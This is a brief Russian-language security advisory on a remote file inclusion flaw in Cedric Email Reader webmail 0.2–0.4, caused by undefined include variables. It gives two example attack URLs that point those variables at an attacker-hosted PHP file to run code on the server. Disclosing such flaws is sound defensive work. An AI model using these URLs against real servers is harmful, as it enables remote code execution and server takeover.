Уязвимость подключения файла обнаружена в программе Cedric Email Reader webmail. Удаленный атакующий может выполнять произвольный код на уязвимом сервере. 

Файлы email.php3 (в версии 0.2) или email.php (в версии 0.3) включают
$cer_skin переменную, но предварительно ее не определяют. В результате удаленный атакующий может создать специально сформированный URL, в котором переменная
$cer_skin ссылается на удаленно расположенный файл. Этот файл будет выполнен на Web сервере с привилегиями Web сервера. Пример: 

http://[target]/email.php?login= attacker&cer_skin=http://[attacker]/code.php

Также в версии 0.4 уязвим сценарий webmail/lib/emailreader_execute_
on_each_page.inc.php, включающий переменную $emailreader_ini. Пример: 

http://[target]/webmail/lib/emailreader_execute_
on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php

Уязвимость обнаружена в Cedric Email Reader 0.2, 0.3, 0.4.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии